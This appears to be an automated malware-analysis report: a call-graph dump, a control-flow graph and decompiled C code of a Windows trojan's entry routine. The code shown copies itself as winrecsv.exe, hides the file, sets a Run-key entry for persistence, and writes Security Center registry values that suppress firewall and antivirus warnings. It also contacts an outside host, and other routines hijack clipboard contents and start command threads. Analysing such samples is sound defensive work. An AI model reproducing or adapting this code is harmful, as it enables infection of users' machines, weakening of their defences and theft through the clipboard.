5461 40456a LeaveCriticalSection 5462->5461 5463 409020 8 API calls 5462->5463 5464 40453c 5463->5464 5464->5461 5862 404f25 5865 404ecb 5862->5865 5863 404efb lstrcmpiW 5863->5865 5864 405076 FindNextFileW 5867 405092 FindClose 5864->5867 5868 404e9f lstrcmpW 5864->5868 5865->5863 5865->5864 5866 404f62 PathMatchSpecW 5865->5866 5869 404fe0 PathFileExistsW 5865->5869 5875 404a90 11 API calls 5865->5875 5866->5865 5871 404f83 wsprintfW SetFileAttributesW DeleteFileW 5866->5871 5872 40509f 5867->5872 5868->5865 5870 404eb5 lstrcmpW 5868->5870 5869->5865 5873 404ff6 wsprintfW wsprintfW 5869->5873 5870->5865 5871->5865 5873->5865 5874 405060 MoveFileExW 5873->5874 5874->5864 5875->5865 5465 40c270 5466 40a4f0 115 API calls 5465->5466 5467 40c2a8 5466->5467 5468 40de70 5469 40de85 ioctlsocket 5468->5469 5470 40df50 5469->5470 5476 40deaa 5469->5476 5472 408fb0 __aligned_recalloc_base 3 API calls 5470->5472 5471 40df39 WaitForSingleObject 5471->5469 5471->5470 5473 40df56 5472->5473 5474 40ded4 recvfrom 5474->5471 5474->5476 5475 408ea0 9 API calls 5475->5476 5476->5471 5476->5474 5476->5475 5477 40df19 InterlockedExchangeAdd 5476->5477 5479 40dd40 5477->5479 5480 40dd75 5479->5480 5481 408e40 7 API calls 5480->5481 5483 40dd9f 5480->5483 5481->5483 5489 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5483->5489 5484 40ddc2 5490 40e1d0 5484->5490 5486 40de5e 5486->5476 5487 40ddd5 5487->5486 5488 40de4b memmove 5487->5488 5488->5487 5489->5484 5491 40e1e2 5490->5491 5492 40e1f5 memcpy 5490->5492 5493 408ea0 9 API calls 5491->5493 5494 40e211 5492->5494 5495 40e1ef 5493->5495 5494->5487 5495->5492 5876 4050b0 Sleep GetModuleFileNameW 5877 40d530 3 API calls 5876->5877 5878 4050e0 5877->5878 5879 405238 ExitThread 5878->5879 5880 4048c0 4 API calls 5878->5880 5881 405228 Sleep 5878->5881 5882 405119 5878->5882 5880->5878 5881->5878 5883 404860 4 API calls 5882->5883 5884 40512a 5883->5884 5885 405150 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5884->5885 5886 40514b 5884->5886 5887 4051c6 wsprintfW 5885->5887 5888 4051db wsprintfW 5885->5888 5887->5888 5889 404bd0 49 API calls 5888->5889 5889->5886 5890 403db0 GetWindowLongW 5891 403dd4 5890->5891 5892 403df6 5890->5892 5893 403de1 5891->5893 5894 403e67 IsClipboardFormatAvailable 5891->5894 5895 403df1 5892->5895 5901 403e46 5892->5901 5902 403e2e SetWindowLongW 5892->5902 5898 403e04 SetClipboardViewer SetWindowLongW 5893->5898 5899 403de7 5893->5899 5896 403e83 IsClipboardFormatAvailable 5894->5896 5897 403e7a 5894->5897 5900 403fe4 DefWindowProcA 5895->5900 5896->5897 5903 403e98 IsClipboardFormatAvailable 5896->5903 5906 403eb5 OpenClipboard 5897->5906 5924 403f7c 5897->5924 5898->5900 5899->5895 5904 403f9d RegisterRawInputDevices ChangeClipboardChain 5899->5904 5901->5895 5905 403e4c SendMessageA 5901->5905 5902->5895 5903->5897 5904->5900 5905->5895 5908 403ec5 GetClipboardData 5906->5908 5906->5924 5907 403f85 SendMessageA 5907->5895 5908->5895 5909 403edd GlobalLock 5908->5909 5909->5895 5910 403ef5 5909->5910 5911 403f08 5910->5911 5912 403f29 5910->5912 5914 403f3e 5911->5914 5915 403f0e 5911->5915 5913 40b570 13 API calls 5912->5913 5916 403f14 GlobalUnlock CloseClipboard 5913->5916 5931 403ce0 5914->5931 5915->5916 5925 403bd0 5915->5925 5920 403f67 5916->5920 5916->5924 5939 403480 lstrlenW 5920->5939 5923 408fb0 __aligned_recalloc_base 3 API calls 5923->5924 5924->5895 5924->5907 5926 403bdb 5925->5926 5927 403be1 lstrlenW 5926->5927 5928 403bf4 5926->5928 5929 408e60 __aligned_recalloc_base 7 API calls 5926->5929 5930 403c11 lstrcpynW 5926->5930 5927->5926 5927->5928 5928->5916 5929->5926 5930->5926 5930->5928 5936 403ced 5931->5936 5932 403cf3 lstrlenA 5932->5936 5937 403d06 5932->5937 5933 403b70 2 API calls 5933->5936 5934 408e60 __aligned_recalloc_base 7 API calls 5934->5936 5936->5932 5936->5933 5936->5934 5936->5937 5938 408fb0 __aligned_recalloc_base 3 API calls 5936->5938 5968 403c90 5936->5968 5937->5916 5938->5936 5940 4034b0 5939->5940 5941 403619 5940->5941 5942 403666 StrStrW 5940->5942 5946 40362b 5940->5946 5941->5923 5943 403691 StrStrW 5942->5943 5942->5946 5945 4036b9 StrStrW 5943->5945 5943->5946 5944 403724 StrStrW 5947 40373b 5944->5947 5951 4037ce StrStrW 5944->5951 5945->5946 5946->5941 5946->5944 5947->5941 5948 403794 isalpha 5947->5948 5947->5951 5948->5947 5949 4037ab isdigit 5948->5949 5949->5941 5949->5947 5952 4039b5 5951->5952 5953 4039bc StrStrW 5951->5953 5952->5953 5954 4039cf StrStrW 5953->5954 5956 4039fb 5954->5956 5957 403a5e StrStrW 5956->5957 5963 403aa5 lstrlenA 5956->5963 5958 403a71 5957->5958 5959 403a78 StrStrW 5957->5959 5958->5959 5960 403a92 StrStrW 5959->5960 5961 403a8b 5959->5961 5960->5963 5961->5960 5963->5941 5964 403af5 GlobalAlloc 5963->5964 5964->5941 5965 403b10 GlobalLock 5964->5965 5965->5941 5966 403b23 memcpy GlobalUnlock OpenClipboard 5965->5966 5966->5941 5967 403b50 EmptyClipboard SetClipboardData CloseClipboard 5966->5967 5967->5941 5971 403c9b 5968->5971 5969 403ca1 lstrlenA 5969->5971 5970 403b70 2 API calls 5970->5971 5971->5969 5971->5970 5972 403cd4 5971->5972 5972->5936 5496 40caf1 5498 40cafa 5496->5498 5497 40cbed 5498->5497 5499 40cb63 lstrcmpiW 5498->5499 5500 40cbe3 SysFreeString 5499->5500 5501 40cb76 5499->5501 5500->5497 5502 40c5b0 2 API calls 5501->5502 5504 40cb84 5502->5504 5503 40cbd5 5503->5500 5504->5500 5504->5503 5505 40cbb3 lstrcmpiW 5504->5505 5506 40cbc5 5505->5506 5507 40cbcb SysFreeString 5505->5507 5506->5507 5507->5503 5508 406979 5509 406982 5508->5509 5510 406991 34 API calls 5509->5510 5511 4077c6 5509->5511

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 405a20-405a3e Sleep 1 405a48-405a54 0->1 2 405a5a-405a74 FindWindowA 1->2 3 4061df-4061ff CreateMutexA GetLastError 1->3 6 405a7a-405abf Sleep MoveFileA * 2 FindWindowA 2->6 7 4061cb-4061da 2->7 4 406201-406203 ExitProcess 3->4 5 406209-40628e GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 3->5 8 406294-4062ad 5->8 9 405ac1-405ad6 Sleep MoveFileA 6->9 10 405adc-405af1 Sleep 6->10 7->1 12 4062fa-4062ff 8->12 13 4062af-4062b7 8->13 9->10 11 405b02-405b0c 10->11 14 405b7a-405bfc DeleteFileW MoveFileW DeleteFileW MoveFileW DeleteFileW Sleep * 2 InternetOpenA DeleteFileW 11->14 15 405b0e-405b75 DeleteFileW MoveFileW Sleep DeleteFileW MoveFileW * 2 Sleep DeleteFileA 11->15 18 406305-406318 12->18 16 4062b9-4062d4 13->16 17 4062ee-4062f8 13->17 20 405c02-405c7b DeleteFileW MoveFileA Sleep DeleteFileW Sleep DeleteFileW InternetOpenUrlA Sleep 14->20 21 405cf4-405d73 Sleep InternetCloseHandle Sleep ShowWindow SetForegroundWindow MoveFileA 14->21 15->11 16->12 22 4062d6-4062ec 16->22 17->18 23 406581-4065ac Sleep RegOpenKeyExA 18->23 24 40631e-406329 call 40d4a0 18->24 27 405cdc-405cee InternetCloseHandle DeleteFileW 20->27 28 405c7d-405c87 20->28 29 405d79-405ded MoveFileW DeleteFileW MoveFileW Sleep DeleteFileA FindWindowA InternetOpenA 21->29 30 405fca-405fd4 21->30 22->8 22->17 25 4065b2-406692 RegSetValueExA * 7 RegCloseKey 23->25 26 406698-4066b8 RegOpenKeyExA 23->26 40 406333-406381 ExpandEnvironmentStringsW wsprintfW CopyFileW 24->40 41 40632b-40632d ExitProcess 24->41 25->26 32 4067a4-4067b9 Sleep call 40b4a0 26->32 33 4066be-40679e RegSetValueExA * 7 RegCloseKey 26->33 27->21 34 405c98-405ca2 28->34 36 405df3-405e3a MoveFileW * 2 InternetOpenUrlA 29->36 37 405e9b-405eba InternetCloseHandle Sleep 29->37 35 405fde-405fea 30->35 62 40690f-406918 32->62 63 4067bf-40690c WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 404200 call 40d3d0 call 4057b0 CreateEventA call 40abd0 call 40bea0 call 40a020 call 40bf50 * 4 32->63 33->32 34->27 45 405ca4-405cda MoveFileW Sleep MoveFileA Sleep 34->45 42 406055-406062 PathFileExistsA 35->42 43 405fec-406006 FindWindowA 35->43 46 405e83-405e95 InternetCloseHandle Sleep 36->46 47 405e3c-405e7d DeleteFileW Sleep DeleteFileA MoveFileW Sleep DeleteFileW 36->47 37->30 39 405ec0-405f12 ShowWindow DeleteFileW SetForegroundWindow Sleep InternetOpenA 37->39 48 405f18-405f3f InternetOpenUrlA 39->48 49 405fbd-405fc4 InternetCloseHandle 39->49 50 406460-4064a2 Sleep wsprintfW CopyFileW 40->50 51 406387-4063b6 SetFileAttributesW RegOpenKeyExW 40->51 56 406064-4060d1 DeleteFileA DeleteFileW Sleep DeleteFileW * 6 MoveFileW 42->56 57 4060d7-4060f1 FindWindowA 42->57 52 406053 43->52 53 406008-40604d Sleep DeleteFileW MoveFileW Sleep * 2 43->53 45->34 46->37 47->46 58 405f41-405f61 MoveFileW Sleep DeleteFileW 48->58 59 405f67-405fb7 InternetCloseHandle DeleteFileW Sleep MoveFileA DeleteFileW MoveFileW DeleteFileA 48->59 49->30 50->23 64 4064a8-4064d7 SetFileAttributesW RegOpenKeyExW 50->64 60 406441-406456 call 40d740 51->60 61 4063bc-4063d1 51->61 52->35 53->52 56->57 65 4060f3-406166 DeleteFileW SetForegroundWindow ShowWindow Sleep MoveFileA DeleteFileA Sleep DeleteFileW * 3 57->65 66 40616c-406176 57->66 58->59 59->49 60->50 83 406458-40645a ExitProcess 60->83 68 4063d7-4063f6 61->68 63->62 71 406562-406577 call 40d740 64->71 72 4064dd-4064f2 64->72 65->66 73 406187-406191 66->73 68->68 77 4063f8-40643b RegSetValueExW RegCloseKey 68->77 71->23 86 406579-40657b ExitProcess 71->86 80 4064f8-406517 72->80 73->7 76 406193-4061c9 MoveFileW DeleteFileW Sleep MoveFileW 73->76 76->73 77->60 80->80 85 406519-40655c RegSetValueExW RegCloseKey 80->85 85->71
                                                                                  C-Code - Quality: 98%
                                                                                  			_entry_() {
                                                                                  				short _v524;
                                                                                  				char _v528;
                                                                                  				int _v532;
                                                                                  				int _v536;
                                                                                  				char _v1060;
                                                                                  				void* _v1064;
                                                                                  				char _v1588;
                                                                                  				short _v2108;
                                                                                  				intOrPtr _v2112;
                                                                                  				short _v2636;
                                                                                  				void* _v2640;
                                                                                  				struct HWND__* _v2644;
                                                                                  				long _v2648;
                                                                                  				struct HWND__* _v2652;
                                                                                  				void* _v2656;
                                                                                  				intOrPtr _v2660;
                                                                                  				long _v2664;
                                                                                  				void* _v2668;
                                                                                  				intOrPtr _v2672;
                                                                                  				intOrPtr _v2676;
                                                                                  				struct HWND__* _v2680;
                                                                                  				int _v2684;
                                                                                  				int _v2688;
                                                                                  				struct HWND__* _v2692;
                                                                                  				struct HWND__* _v2696;
                                                                                  				int _v2700;
                                                                                  				char _v3100;
                                                                                  				intOrPtr* _v3104;
                                                                                  				int _v3108;
                                                                                  				short _v3110;
                                                                                  				short _v3112;
                                                                                  				int _v3116;
                                                                                  				int _v3120;
                                                                                  				intOrPtr* _v3124;
                                                                                  				intOrPtr _v3128;
                                                                                  				short _v3130;
                                                                                  				signed int _v3136;
                                                                                  				intOrPtr* _v3140;
                                                                                  				intOrPtr _v3144;
                                                                                  				short _v3146;
                                                                                  				signed int _v3152;
                                                                                  				void* _t182;
                                                                                  				int _t190;
                                                                                  				intOrPtr _t210;
                                                                                  				signed char _t253;
                                                                                  				signed char _t264;
                                                                                  				struct HWND__* _t271;
                                                                                  				short _t367;
                                                                                  				intOrPtr _t371;
                                                                                  				short _t397;
                                                                                  				intOrPtr _t413;
                                                                                  				intOrPtr _t414;
                                                                                  				void* _t446;
                                                                                  				void* _t447;
                                                                                  				void* _t454;
                                                                                  
                                                                                  				Sleep(0x1b58); // executed
                                                                                  				_v536 = 0;
                                                                                  				_v2112 = 0x2332;
                                                                                  				while(_v536 < _v2112) {
                                                                                  					_t271 = FindWindowA("579795729858927452784", 0); // executed
                                                                                  					_v2644 = _t271;
                                                                                  					if(_v2644 == 0) {
                                                                                  						L40:
                                                                                  						_v536 = _v536 + 1;
                                                                                  						continue;
                                                                                  					}
                                                                                  					Sleep(0x3e8);
                                                                                  					MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					_v2680 = FindWindowA("579795729858927452784", 0);
                                                                                  					if(_v2680 != 0) {
                                                                                  						Sleep(0x3e8);
                                                                                  						MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					}
                                                                                  					Sleep(0x3e8);
                                                                                  					_v2684 = 0;
                                                                                  					while(_v2684 < 0x7d0) {
                                                                                  						DeleteFileW(L"argarhargafafargh");
                                                                                  						MoveFileW(L"4yy4w4yw4fwgwgw", L"ffag8f2g8fg82g8f8g8fg");
                                                                                  						Sleep(0xbb8);
                                                                                  						DeleteFileW(L"argarhargafafargh");
                                                                                  						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  						Sleep(0xfa0);
                                                                                  						DeleteFileA("579795729858927452784");
                                                                                  						_v2684 = _v2684 + 1;
                                                                                  					}
                                                                                  					DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  					MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  					DeleteFileW(L"argarhargafafargh");
                                                                                  					MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  					DeleteFileW(L"argarhargafafargh");
                                                                                  					Sleep(0xbb8);
                                                                                  					Sleep(0xbb8);
                                                                                  					_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
                                                                                  					DeleteFileW(L"ffag8f2g8fg82g8f8g8fg");
                                                                                  					if(_v2668 == 0) {
                                                                                  						L16:
                                                                                  						Sleep(0x7d0);
                                                                                  						InternetCloseHandle(_v2668);
                                                                                  						Sleep(0x2710);
                                                                                  						ShowWindow(_v2644, 1);
                                                                                  						SetForegroundWindow(_v2644);
                                                                                  						MoveFileA("579795729858927452784", "2dgd828d8g8fg8g8g");
                                                                                  						_v2676 = 0x37;
                                                                                  						_v2660 = 0x2c;
                                                                                  						_v2672 = _v2676 + _v2660;
                                                                                  						if(_v2672 < 0x2328) {
                                                                                  							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  							DeleteFileW(L"argarhargafafargh");
                                                                                  							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  							Sleep(0x7d0);
                                                                                  							DeleteFileA("2dgd828d8g8fg8g8g");
                                                                                  							_v2692 = FindWindowA("aefafugaugfgauegf", 0);
                                                                                  							_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
                                                                                  							if(_v2668 != 0) {
                                                                                  								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  								_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
                                                                                  								if(_v2656 != 0) {
                                                                                  									DeleteFileW(L"argarhargafafargh");
                                                                                  									Sleep(0x1388);
                                                                                  									DeleteFileA("579795729858927452784");
                                                                                  									MoveFileW(L"4yy4w4yw4fwgwgw", L"argarhrharharfafrahth");
                                                                                  									Sleep(0xfa0);
                                                                                  									DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  								}
                                                                                  								InternetCloseHandle(_v2656);
                                                                                  								Sleep(0xdac);
                                                                                  							}
                                                                                  							InternetCloseHandle(_v2668);
                                                                                  							Sleep(0xfa0);
                                                                                  							if(_v2692 != 0) {
                                                                                  								ShowWindow(_v2692, 0);
                                                                                  								DeleteFileW(L"argarhargafafargh");
                                                                                  								SetForegroundWindow(_v2692);
                                                                                  								Sleep(0x1388);
                                                                                  								_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
                                                                                  								if(_v2668 != 0) {
                                                                                  									_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
                                                                                  									if(_v2656 != 0) {
                                                                                  										MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  										Sleep(0x2710);
                                                                                  										DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  									}
                                                                                  									InternetCloseHandle(_v2656);
                                                                                  									DeleteFileW(L"argarhargafafargh");
                                                                                  									Sleep(0x64);
                                                                                  									MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  									DeleteFileW(L"argarhargafafargh");
                                                                                  									MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  									DeleteFileA("2dgd828d8g8fg8g8g");
                                                                                  								}
                                                                                  								InternetCloseHandle(_v2668);
                                                                                  							}
                                                                                  						}
                                                                                  						_v2664 = 0x1388;
                                                                                  						_v2648 = 0x1f4;
                                                                                  						while(_v2664 > _v2648) {
                                                                                  							_v2696 = FindWindowA("2dgd828d8g8fg8g8g", 0);
                                                                                  							if(_v2696 != 0) {
                                                                                  								Sleep(0x7d0);
                                                                                  								DeleteFileW(L"argarhargafafargh");
                                                                                  								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  								Sleep(0x1388);
                                                                                  								Sleep(0x1388);
                                                                                  								_v2648 = _v2648 + 1;
                                                                                  							}
                                                                                  						}
                                                                                  						if(PathFileExistsA("aefafugaugfgauegf") != 0) {
                                                                                  							DeleteFileA("579795729858927452784");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							Sleep(0x1f4);
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							MoveFileW(L"4yy4w4yw4fwgwgw", L"ffag8f2g8fg82g8f8g8fg");
                                                                                  						}
                                                                                  						_v2652 = FindWindowA("aefyaiegfayegfg", 0);
                                                                                  						if(_v2652 != 0) {
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							SetForegroundWindow(_v2644);
                                                                                  							ShowWindow(_v2644, 1);
                                                                                  							Sleep(0x3a98);
                                                                                  							MoveFileA("feu8gf8g2gf8g2fg", "aefafugaugfgauegf");
                                                                                  							DeleteFileA("579795729858927452784");
                                                                                  							Sleep(0x1f4);
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"argarhargafafargh");
                                                                                  						}
                                                                                  						_v2700 = 0;
                                                                                  						while(_v2700 < 0xfa0) {
                                                                                  							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							Sleep(0x2328);
                                                                                  							MoveFileW(L"argarhrharharfafrahth", L"4yy4w4yw4fwgwgw");
                                                                                  							_v2700 = _v2700 + 1;
                                                                                  						}
                                                                                  						goto L40;
                                                                                  					}
                                                                                  					DeleteFileW(L"argarhargafafargh");
                                                                                  					MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					Sleep(0x1388);
                                                                                  					DeleteFileW(L"ffag8f2g8fg82g8f8g8fg");
                                                                                  					Sleep(0xbb8);
                                                                                  					DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  					_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
                                                                                  					Sleep(0xbb8);
                                                                                  					if(_v2656 == 0) {
                                                                                  						L15:
                                                                                  						InternetCloseHandle(_v2656);
                                                                                  						DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  						goto L16;
                                                                                  					}
                                                                                  					_v2688 = 0;
                                                                                  					while(_v2688 < 0x7d0) {
                                                                                  						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  						Sleep(0x7d0);
                                                                                  						MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  						Sleep(0xfa0);
                                                                                  						_v2688 = _v2688 + 1;
                                                                                  					}
                                                                                  					goto L15;
                                                                                  				}
                                                                                  				_t182 = CreateMutexA(0, 0, "984658"); // executed
                                                                                  				_v2640 = _t182;
                                                                                  				if(GetLastError() != 0xb7) {
                                                                                  					_v1064 = 0;
                                                                                  					_v528 = 1;
                                                                                  					GetModuleFileNameW(0, 0x414a30, 0x105);
                                                                                  					_v532 = PathFindFileNameW(0x414a30);
                                                                                  					wsprintfW( &_v524, L"%s:Zone.Identifier", 0x414a30);
                                                                                  					_t447 = _t446 + 0xc;
                                                                                  					DeleteFileW( &_v524);
                                                                                  					ExpandEnvironmentStringsW(L"%userprofile%",  &_v2636, 0x104);
                                                                                  					_v3104 = L"winrecsv.exe";
                                                                                  					_v3108 = _v532;
                                                                                  					while(1) {
                                                                                  						_t190 = _v3108;
                                                                                  						_t367 =  *_t190;
                                                                                  						_v3110 = _t367;
                                                                                  						if(_t367 !=  *_v3104) {
                                                                                  							break;
                                                                                  						}
                                                                                  						if(_v3110 == 0) {
                                                                                  							L48:
                                                                                  							_v3116 = 0;
                                                                                  							L50:
                                                                                  							_v3120 = _v3116;
                                                                                  							if(_v3120 == 0) {
                                                                                  								L67:
                                                                                  								Sleep(0x1f4);
                                                                                  								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006,  &_v1064) == 0) {
                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegCloseKey(_v1064);
                                                                                  								}
                                                                                  								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center\\Svc", 0, 0x20006,  &_v1064) == 0) {
                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegCloseKey(_v1064);
                                                                                  								}
                                                                                  								Sleep(0x1f4);
                                                                                  								if((E0040B4A0() & 0x000000ff) != 0) {
                                                                                  									__imp__#115(0x202,  &_v3100);
                                                                                  									wsprintfW(0x414c40, L"%s\\tnnodes.dat",  &_v2636);
                                                                                  									wsprintfW(0x414620, L"%s\\tncmds.dat",  &_v2636);
                                                                                  									CreateThread(0, 0, E00404000, 0, 0, 0);
                                                                                  									Sleep(0x1f4);
                                                                                  									CreateThread(0, 0, E004050B0, 0, 0, 0);
                                                                                  									Sleep(0x1f4);
                                                                                  									CreateThread(0, 0, E00405900, 0, 0, 0);
                                                                                  									Sleep(0x2710);
                                                                                  									E00404200();
                                                                                  									E004057B0(E0040D3D0(),  &_v2636);
                                                                                  									 *0x414e64 = CreateEventA(0, 1, 0, 0);
                                                                                  									 *0x414e6c = E0040ABD0( &_v2636);
                                                                                  									 *0x414e68 = E0040BEA0( &_v2636);
                                                                                  									E0040A020();
                                                                                  									_t413 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t413, 0, E0040C360, 0, 0, 0);
                                                                                  									_t210 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t210, 0, E0040C2C0, 0, 0, 0);
                                                                                  									_t371 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t371, 0, E0040BE50, 0, 0, 0);
                                                                                  									_t414 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t414, 0, E0040BC50, 0, 0, 0);
                                                                                  								}
                                                                                  								return 0;
                                                                                  							}
                                                                                  							if((E0040D4A0() & 0x000000ff) != 1) {
                                                                                  								ExpandEnvironmentStringsW(L"%windir%",  &_v2108, 0x104);
                                                                                  								wsprintfW( &_v1588, L"%s\\%s",  &_v2108, L"winrecsv.exe");
                                                                                  								_t454 = _t447 + 0x10;
                                                                                  								if(CopyFileW(0x414a30,  &_v1588, 0) == 0) {
                                                                                  									L60:
                                                                                  									Sleep(0x1f4);
                                                                                  									wsprintfW( &_v1060, L"%s\\%s",  &_v2636, L"winrecsv.exe");
                                                                                  									_t447 = _t454 + 0x10;
                                                                                  									if(CopyFileW(0x414a30,  &_v1060, 0) == 0) {
                                                                                  										goto L67;
                                                                                  									}
                                                                                  									SetFileAttributesW( &_v1060, 3);
                                                                                  									if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                  										L65:
                                                                                  										_t253 = E0040D740( &_v1060);
                                                                                  										_t447 = _t447 + 4;
                                                                                  										if((_t253 & 0x000000ff) != 1) {
                                                                                  											goto L67;
                                                                                  										}
                                                                                  										ExitProcess(0);
                                                                                  									}
                                                                                  									_v3140 =  &_v1060;
                                                                                  									_v3144 = _v3140 + 2;
                                                                                  									do {
                                                                                  										_v3146 =  *_v3140;
                                                                                  										_v3140 = _v3140 + 2;
                                                                                  									} while (_v3146 != 0);
                                                                                  									_v3152 = _v3140 - _v3144 >> 1;
                                                                                  									RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1060, _v3152 + _v3152 + 2);
                                                                                  									RegCloseKey(_v1064);
                                                                                  									goto L65;
                                                                                  								}
                                                                                  								SetFileAttributesW( &_v1588, 3);
                                                                                  								if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                  									L58:
                                                                                  									_t264 = E0040D740( &_v1588);
                                                                                  									_t454 = _t454 + 4;
                                                                                  									if((_t264 & 0x000000ff) != 1) {
                                                                                  										goto L60;
                                                                                  									}
                                                                                  									ExitProcess(0);
                                                                                  								}
                                                                                  								_v3124 =  &_v1588;
                                                                                  								_v3128 = _v3124 + 2;
                                                                                  								do {
                                                                                  									_v3130 =  *_v3124;
                                                                                  									_v3124 = _v3124 + 2;
                                                                                  								} while (_v3130 != 0);
                                                                                  								_v3136 = _v3124 - _v3128 >> 1;
                                                                                  								RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1588, _v3136 + _v3136 + 2);
                                                                                  								RegCloseKey(_v1064);
                                                                                  								goto L58;
                                                                                  							}
                                                                                  							ExitProcess(0);
                                                                                  						}
                                                                                  						_t190 = _v3108;
                                                                                  						_t397 =  *((intOrPtr*)(_t190 + 2));
                                                                                  						_v3112 = _t397;
                                                                                  						_t86 = _v3104 + 2; // 0x6e0069
                                                                                  						if(_t397 !=  *_t86) {
                                                                                  							break;
                                                                                  						}
                                                                                  						_v3108 = _v3108 + 4;
                                                                                  						_v3104 = _v3104 + 4;
                                                                                  						if(_v3112 != 0) {
                                                                                  							continue;
                                                                                  						}
                                                                                  						goto L48;
                                                                                  					}
                                                                                  					asm("sbb eax, eax");
                                                                                  					asm("sbb eax, 0xffffffff");
                                                                                  					_v3116 = _t190;
                                                                                  					goto L50;
                                                                                  				}
                                                                                  				ExitProcess(0); // executed
                                                                                  			}


























































                                                                                  0x00405a2e
                                                                                  0x00405a34
                                                                                  0x00405a3e
                                                                                  0x00405a48
                                                                                  0x00405a61
                                                                                  0x00405a67
                                                                                  0x00405a74
                                                                                  0x004061cb
                                                                                  0x004061d4
                                                                                  0x00000000
                                                                                  0x004061d4
                                                                                  0x00405a7f
                                                                                  0x00405a8f
                                                                                  0x00405a9f
                                                                                  0x00405ab2
                                                                                  0x00405abf
